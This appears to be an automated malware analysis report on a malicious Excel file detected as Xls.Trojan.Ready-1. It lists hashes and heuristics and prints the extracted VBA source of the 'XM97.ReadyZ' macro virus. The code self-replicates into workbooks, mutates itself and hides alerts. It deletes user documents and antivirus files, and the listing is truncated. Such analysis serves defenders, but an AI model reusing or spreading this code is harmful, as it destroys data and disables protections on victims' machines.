Office (OLE) malware analysis — malicious · 3bd9e0d6552c334b

MALICIOUS

Office (OLE)

46.5 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: a0f18ea1f440ecda561c8c3e600a3c7a SHA-1: f20bfe734883d62d3a4b9df2bf6ee9e368294f9b SHA-256: 3bd9e0d6552c334b8d9058d65019e0a7be4570fcc96fe86f80cff035ab85d504

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV detection and high-severity heuristic for an Auto_Open macro indicate malicious intent. The Auto_Open VBA macro is designed to execute automatically upon opening the Excel file, likely to download and execute a secondary payload. The presence of VBA macros points to the T1059.005 (Visual Basic) technique, and the overall nature of malicious Office documents suggests T1566.001 (Spearphishing Attachment) as the likely initial access vector.

Heuristics 3

ClamAV: Xls.Trojan.Ready-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Ready-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4517 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4517 bytes
SHA-256: `94d22bc61b21284a706829a414eb7f780c98ae3425b400aebaadcbadfe185a10`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet4" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet5" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet6" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "ReadyZ" Sub Auto_Open() ' -= [LineZerØ's Macro Engine 1.2] =- ' -= [XM97.ReadyZ] =- ' -= [ID: 21477-Gj-64002738-Jm.X] =- Application.OnSheetActivate = "UxO9054" End Sub Sub UxO9054() On Error Resume Next VoNzRz3435 = "ReadyZ" PoRrNm9054 = "PERSONAL.XLS" EgVyTl6400 = Application.StartupPath & "\" & PoRrNm9054 HsNrFv3285PoRrNm2738 = 0 NyCzTm9054VoNzRz6400 = 0 With Application .StatusBar = "XM97.ReadyZ" .ScreenUpdating = False .DisplayAlerts = False .EnableCancelKey = xlDisabled End With CommandBars("Tools").Controls(10).Delete CommandBars("Tools").Controls(12).Delete CommandBars("View").Controls(3).Delete CommandBars("Window").Controls(3).Delete CommandBars("Window").Controls(4).Delete 'This code is taken from Pyro \| Thanks Set Current = MacroContainer For Grow = 1 To 20 Number = Current.VBProject.VBComponents("ReadyZ").CodeModule.ProcCountLines("UxO9054", vbext_pk_Proc) RandomLine = Int(Rnd() * Number + 1) RemarkLength = Int(Rnd() * 40 + 1) For Length = 1 To RemarkLength Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65)) Next Length Current.VBProject.VBComponents("ReadyZ").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark Remark = "" Next Grow VD8435 = GetSetting("ReadyZ", "ICounter", "Count", "") If VD8435 = 20 Then Kill ("c:\my documents\.") Call Gj6400 Call HsNrFvVD End If Application.VBE.ActiveVBProject.VBComponents.Item(VoNzRz3435).Export "C:\ReadyZ.sys" If Dir(EgVyTl6400) = PoRrNm9054 Then NyCzTm9054VoNzRz6400 = 1 For x = 1 To ActiveWorkbook.VBProject.VBComponents.Count If ActiveWorkbook.VBProject.VBComponents(x).Name = VoNzRz3435 Then HsNrFv3285PoRrNm2738 = 1 Next x If HsNrFv3285PoRrNm2738 = 0 Then ActiveWorkbook.VBProject.VBComponents.Import "C:\ReadyZ.sys" ActiveWorkbook.Save End If If NyCzTm9054VoNzRz6400 = 0 Then Workbooks.Add.SaveAs FileName:=EgVyTl6400 ActiveWorkbook.VBProject.VBComponents.Import "C:\ReadyZ.sys" ActiveWindow.Visible = False Workbooks(PoRrNm9054).Save End If Call Jm9054 End Sub Sub HsNrFvVD() On Error Resume Next Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN\.") Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN95\.") Kill ("C:\Programme\Norton Antivirus\V32scan.dll") Kill ("C:\Programme\N ... (truncated)

SHA-256: 94d22bc61b21284a706829a414eb7f780c98ae3425b400aebaadcbadfe185a10

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ReadyZ"
Sub Auto_Open()

    ' -= [LineZerØ's Macro Engine 1.2] =-
    ' -= [XM97.ReadyZ] =-

    ' -= [ID: 21477-Gj-64002738-Jm.X] =-

Application.OnSheetActivate = "UxO9054"
End Sub

Sub UxO9054()
On Error Resume Next
VoNzRz3435 = "ReadyZ"
PoRrNm9054 = "PERSONAL.XLS"
EgVyTl6400 = Application.StartupPath & "\" & PoRrNm9054
HsNrFv3285PoRrNm2738 = 0
NyCzTm9054VoNzRz6400 = 0
With Application
.StatusBar = "XM97.ReadyZ"
.ScreenUpdating = False
.DisplayAlerts = False
.EnableCancelKey = xlDisabled
End With
CommandBars("Tools").Controls(10).Delete
CommandBars("Tools").Controls(12).Delete
CommandBars("View").Controls(3).Delete
CommandBars("Window").Controls(3).Delete
CommandBars("Window").Controls(4).Delete
 'This code is taken from Pyro | Thanks
Set Current = MacroContainer
For Grow = 1 To 20
Number = Current.VBProject.VBComponents("ReadyZ").CodeModule.ProcCountLines("UxO9054", vbext_pk_Proc)
RandomLine = Int(Rnd() * Number + 1)
RemarkLength = Int(Rnd() * 40 + 1)
For Length = 1 To RemarkLength
Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next Length
Current.VBProject.VBComponents("ReadyZ").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
Remark = ""
Next Grow
VD8435 = GetSetting("ReadyZ", "ICounter", "Count", "")
If VD8435 = 20 Then
Kill ("c:\my documents\*.*")
Call Gj6400
Call HsNrFvVD
End If
Application.VBE.ActiveVBProject.VBComponents.Item(VoNzRz3435).Export "C:\ReadyZ.sys"
If Dir(EgVyTl6400) = PoRrNm9054 Then NyCzTm9054VoNzRz6400 = 1
For x = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(x).Name = VoNzRz3435 Then HsNrFv3285PoRrNm2738 = 1
Next x
If HsNrFv3285PoRrNm2738 = 0 Then
ActiveWorkbook.VBProject.VBComponents.Import "C:\ReadyZ.sys"
ActiveWorkbook.Save
End If
If NyCzTm9054VoNzRz6400 = 0 Then
Workbooks.Add.SaveAs FileName:=EgVyTl6400
ActiveWorkbook.VBProject.VBComponents.Import "C:\ReadyZ.sys"
ActiveWindow.Visible = False
Workbooks(PoRrNm9054).Save
End If
Call Jm9054
End Sub
Sub HsNrFvVD()
On Error Resume Next
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN\*.*")
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN95\*.*")
Kill ("C:\Programme\Norton Antivirus\V32scan.dll")
Kill ("C:\Programme\N
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.